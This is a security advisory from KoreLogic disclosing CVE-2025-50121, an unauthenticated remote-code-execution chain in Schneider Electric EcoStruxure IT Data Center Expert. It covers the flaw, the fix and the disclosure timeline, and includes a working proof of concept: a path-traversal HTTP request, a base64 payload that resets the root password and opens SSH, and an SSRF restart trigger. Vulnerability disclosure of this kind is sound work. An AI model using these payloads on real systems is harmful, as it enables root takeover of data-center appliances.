KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Advisory ID: KL-001-2025-007 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-007.txt 1. Vulnerability Details      Affected Vendor: Schneider Electric      Affected Product: EcoStruxure IT Data Center Expert      Affected Version: 8.3 and prior      Platform: CentOS      CWE Classification: CWE-23: Relative Path Traversal,                          CWE-78: Improper Neutralization of Special                          Elements used in an OS Command                          ('OS Command Injection')      CVE ID: CVE-2025-50121 2. Vulnerability Description      The Data Center Expert ("DCE") appliance lacks authorization      controls and allows anyone to masquerade as a NetBotz camera. A      path traversal vulnerability enables an attacker to create      a malicious folder name capable of injecting arguments into      specific shell commands during application boot. By leveraging      a separate server-side request forgery (SSRF) vulnerability,      an attacker can chain these two issues to obtain a root shell      from a completely unauthenticated perspective. 3. Technical Description      APC NetBotz devices can be configured to report information      to the Data Center Expert appliance via the DCE web      application. This information contains various metrics, device      alerts, and photographs.      The "/botpost/surveillance" HTTP route enables devices to      upload images via a multipart POST request. This route does      not require authentication.      When an image is uploaded, the first parameter in the POST      body is loosely parsed as XML. This XML contains the variable      "nbCameraUid" which is used to construct a folder name that is      later created on the DCE filesystem. No input validation is      done for "nbCameraUid", enabling an unauthenticated attacker to      abuse dot-segments (../) and write a folder with an arbitrary      name anywhere on the DCE filesystem.      This behavior is dangerous, as several shell scripts exist on      the appliance that leverage globbing to build commands that      are later executed. For example, the "nbfunctions" script uses      the following snippet to build the "ISXC_CLASSPATH" variable:          for i in "$NBC_HOME"/tomcat/lib/*.jar; do              ISXC_CLASSPATH="${ISXC_CLASSPATH}:${i}"          done"      This shell script "central.sh" uses the "ISXC_CLASSPATH"      varible as an argument when starting the Tomcat web server      after a reboot:          "$JAVA_HOME"/bin/java -server -Dprocess.name=isxc -Djava.awt.headless=true \                  $JMEM_OPTS $JGC $JMISC_OPTS ${DEBUG_OPTS:+"$DEBUG_OPTS"} $JMX_OPTS $PROFILE_OPTS \                  -DMAC_ADDRESS="$MAC_ADDRESS" -DNBC_HOME="$NBC_HOME" -Duser.timezone="$NBC_TIMEZONE" \                  -Duser.language="$NBC_LANG" -Duser.country="$NBC_COUNTRY" \ -Dorg.apache.cxf.Logger=org.apache.cxf.common.logging.Log4jLogger \ -Dorg.restlet.engine.loggerFacadeClass=org.restlet.ext.slf4j.Slf4jLoggerFacade \                  -cp $ISXC_CLASSPATH com.netbotz.server.Main      Since globbing does not differentiate between folders and files,      it is possible to inject command-line arguments into the "java"      invocation as long as the folder name ends with the string      ".jar".      To exploit this behavior, an attacker can inject the "-Xms1m",      "-Xmx2m", and "XX:OnOutOfMemoryError" arguments, which severely      limit the total memory allocated for the "java" runtime. The      value of the "XX:OnOutOfMemoryError" argument will be executed      as an additional shell command whenever this limited memory      is exhausted. 4. Mitigation and Remediation Recommendation      Version 9.0 of EcoStruxure IT Data Center Expert includes      fixes for these vulnerabilities and is available upon request      from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit      This vulnerability was discovered by Jaggar Henry and Jim      Becher of KoreLogic, Inc. 6. Disclosure Timeline      2025-02-14 : KoreLogic reports vulnerability details to                   Schneider Electric CPCERT.      2025-02-17 : Vendor acknowledges receipt of KoreLogic's                   submission.      2025-02-25 : Vendor confirms the reported vulnerability.      2025-02-28 : Vendor requests a meeting with KoreLogic to discuss                   the timeline of remediation efforts for this                   vulnerability, as well as for associated submissions                   from KoreLogic.      2025-03-04 : KoreLogic and Schneider Electric agree to embargo                   vulnerability details until product update 9.0,                   circa July, 2025.      2025-06-20 : Vendor notifies KoreLogic that the publication date                   for this vulnerability will be 2025-07-08.      2025-07-08 : Vendor public disclosure.      2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept      As a proof-of-concept, the following HTTP request can be sent      to the DCE appliance:          POST /botpost/surveillance HTTP/1.1          Host: victim.com          Content-Length: 1010          Content-Type: multipart/form-data; boundary=09b3621e3cb4509abb3722922089bc54          --09b3621e3cb4509abb3722922089bc54          Content-Disposition: form-data; name="foo"; filename=""          Content-Type: application/xml                       somePrefix              timestamp="1627896543210"              someMiddleData              nbSerialNum00:00:00:00:00:00<              someMiddleData                           someMiddleData                           someSuffix                   --09b3621e3cb4509abb3722922089bc54          Content-Disposition: form-data; name="bar"; filename="korelogic.jpeg"          Content-Type: image/jpeg          z          --09b3621e3cb4509abb3722922089bc54--      This will create a maliciously named folder in the      "/usr/local/netbotz/nbc/tomcat/lib/" directory:          [root@dce ~]# ls /usr/local/netbotz/nbc/tomcat/lib/           catalina.jar           catalina-optional.jar           commons-modeler-2.0.1.jar           jsp-api.jar           naming-factory.jar           naming-resources.jar           servlet-api.jar           tomcat-ajp.jar           tomcat-coyote.jar           tomcat-http.jar           tomcat-util.jar          'zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar'      When the Tomcat server reboots (either during a system upgrade      or user initiated), the folder name is globbed and successfully      injects arguments into the "java" invocation:          [root@dce ~]# ps aux | grep tomcat          root       73359  0.0  0.1 7384952 37052 ?       Sl 02:26   0:00 /etc/alternatives/jre/bin/java -cp :/usr/local/netbotz/nbc/jars/activation-1.1.jar:...:/usr/local/netbotz/nbc/tomcat/lib/tomcat-util.jar:/usr/local/netbotz/nbc/tomcat/lib/zzz -Xms1m -Xmx2m -XX:-OmitStackTraceInFastThrow -XX:OnOutOfMemoryError=echo${IFS}ZWNobyByb290OmtvcmVsb2dpYyB8IGNocGFzc3dkOyBzeXN0ZW1jdGwgc3RhcnQgc3NoZDsgaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIgLWogQUNDRVBU|base64$IFS-d|bash -Dfoo=bar.jar com.netbotz.server.tools.NBVars -g nbc.timezone      Due to the injected "Xms" and "Xmx" flags, an "OutOfMemory"      error is thrown, and the following shell commands are executed      (after being base64 decoded):          echo root:korelogic | chpasswd; systemctl start sshd; iptables -I INPUT -p tcp --dport 22 -j ACCEPT      This effectively changes the "root" password to the string      "korelogic", enables SSH, and modifies the firewall rules to      allow access to port 22 (TCP), enabling an attacker to SSH into      the appliance.          [goon@security struxureware]$ ssh -t root@192.168.2.90 id          root@192.168.2.90's password:          uid=0(root) gid=0(root) groups=0(root)          Connection to 192.168.2.90 closed.      When port 80 is enabled, an attacker can leverage a      separate server-side request forgery (SSRF) vulnerability      (CVE-2025-50125/KL-001-2025-011) in the "/plugins" route and      force a restart of the Tomcat server by sending a malformed      HTTP request. Take for example the following HTTP request:          rnmf /plugins HTTP/1.1          Host: 127.0.0.1:7613          Connection: keep-alive      The DCE web application unsafely proxies this request to      a Java service only accessible via the loopback interface.      The following snippet is from the decompiled JAR responsible      for this service:          while (true) {              final InetAddress local = InetAddress.getByName("127.0.0.1");              final ServerSocket server = new ServerSocket(7613, 5, local);              final Socket connect = server.accept();              this.logger.debug((Object)"Received socket connection...");              final BufferedReader in = new BufferedReader(new InputStreamReader(connect.getInputStream()));              String val = in.readLine();              if (val == null) {                  val = "";              }              final boolean doReboot = val.startsWith("rnmf");      The code indicates that when a stream of data begins with      the ASCII characters "rnmf" it is interpreted as a "reboot"      instruction, and subsequently stops and starts the Tomcat server.      KoreLogic created a proof-of-concept script named      "unauth2shell.py" that leverages these two vulnerabilities      to obtain a shell as the "root" user from a completely      unauthenticated perspective.          [attacker@box]$ python unauth2shell.py          [~] Creating malicious folder...          [+] Created malicious folder          [~] Restarting application...          [+] Restart successfully initiated          [~] Polling...          [~] Polling...          [~] Polling...          [~] Polling...          [~] Polling...          [+] Restart successful          [root@dce ~]# id          uid=0(root) gid=0(root) groups=0(root) The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy